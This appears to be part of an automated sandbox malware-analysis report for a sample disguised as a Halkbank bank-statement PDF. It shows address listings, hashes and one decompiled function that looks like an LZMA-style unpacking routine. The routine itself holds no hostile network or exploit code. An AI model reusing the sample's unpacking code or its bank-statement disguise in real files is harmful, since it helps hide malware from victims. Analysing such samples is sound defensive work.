                                                      0x004072d9
                                                      0x004072d9
                                                      0x004072e1
                                                      0x004072e6
                                                      0x004072e8
                                                      0x004072eb
                                                      0x004072eb
                                                      0x0040731a
                                                      0x00407321
                                                      0x004072ab
                                                      0x004072ab
                                                      0x004072ab
                                                      0x004072ab
                                                      0x00000000
                                                      0x00407323
                                                      0x00000000
                                                      0x00407323
                                                      0x00407321
                                                      0x00407234
                                                      0x00407237
                                                      0x00407239
                                                      0x0040723c
                                                      0x0040723f
                                                      0x00407242
                                                      0x00407244
                                                      0x00407247
                                                      0x0040724a
                                                      0x0040724a
                                                      0x0040724d
                                                      0x0040724d
                                                      0x00407250
                                                      0x00407257
                                                      0x0040722b
                                                      0x0040722b
                                                      0x0040722b
                                                      0x0040722b
                                                      0x00000000
                                                      0x00407259
                                                      0x00000000
                                                      0x00407259
                                                      0x00407257
                                                      0x004071dd
                                                      0x004071e0
                                                      0x004071e2
                                                      0x004071e5
                                                      0x00000000
                                                      0x00000000
                                                      0x00406f44
                                                      0x00406f44
                                                      0x00406f48
                                                      0x0040758d
                                                      0x00000000
                                                      0x0040758d
                                                      0x00406f4e
                                                      0x00406f51
                                                      0x00406f54
                                                      0x00406f57
                                                      0x00406f5a
                                                      0x00406f5d
                                                      0x00406f60
                                                      0x00406f62
                                                      0x00406f65
                                                      0x00406f68
                                                      0x00406f6b
                                                      0x00406f6d
                                                      0x00406f6d
                                                      0x00406f6d
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040734c
                                                      0x0040734c
                                                      0x0040734c
                                                      0x00407350
                                                      0x00000000
                                                      0x00000000
                                                      0x00407356
                                                      0x00407359
                                                      0x0040735c
                                                      0x0040735f
                                                      0x00407361
                                                      0x00407361
                                                      0x00407361
                                                      0x00407364
                                                      0x00407367
                                                      0x0040736a
                                                      0x0040736d
                                                      0x00407370
                                                      0x00407373
                                                      0x00407374
                                                      0x00407376
                                                      0x00407376
                                                      0x00407376
                                                      0x00407379
                                                      0x0040737c
                                                      0x0040737f
                                                      0x00407382
                                                      0x00407385
                                                      0x00407389
                                                      0x0040738b
                                                      0x0040738e
                                                      0x00000000
                                                      0x00407390
                                                      0x00000000
                                                      0x00407390
                                                      0x0040738e
                                                      0x004075c3
                                                      0x00000000
                                                      0x00000000
                                                      0x00406bf2

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                      • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                                                      • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                      • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406BB0 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 98%
                                                      			E00406BB0(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                      0x00406bc0
                                                      0x00406bc7
                                                      0x00406bcd
                                                      0x00406bd3
                                                      0x00000000
                                                      0x00406bd7
                                                      0x00406be3
                                                      0x00406be3
                                                      0x00406be3
                                                      0x00406bec
                                                      0x00000000
                                                      0x00000000
                                                      0x00406bf2
                                                      0x00000000
                                                      0x00406bf9
                                                      0x00406bfd
                                                      0x00000000
                                                      0x00000000
                                                      0x00406c06
                                                      0x00406c09
                                                      0x00406c0c
                                                      0x00406c0e
                                                      0x00406c10
                                                      0x00000000
                                                      0x00000000
                                                      0x00406c16
                                                      0x00406c19
                                                      0x00406c1b
                                                      0x00406c1c
                                                      0x00406c1f
                                                      0x00406c21
                                                      0x00406c22
                                                      0x00406c24
                                                      0x00406c27
                                                      0x00406c2c
                                                      0x00406c31
                                                      0x00406c3a
                                                      0x00406c4d
                                                      0x00406c50
                                                      0x00406c59
                                                      0x00406c5c
                                                      0x00406c84
                                                      0x00406c84
                                                      0x00406c86
                                                      0x00406c94
                                                      0x00406c94
                                                      0x00406c98
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00406c88
                                                      0x00406c88
                                                      0x00406c8b
                                                      0x00406c8b
                                                      0x00406c8c
                                                      0x00406c8c
                                                      0x00000000
                                                      0x00406c88
                                                      0x00406c5e
                                                      0x00406c62
                                                      0x00406c67
                                                      0x00406c67
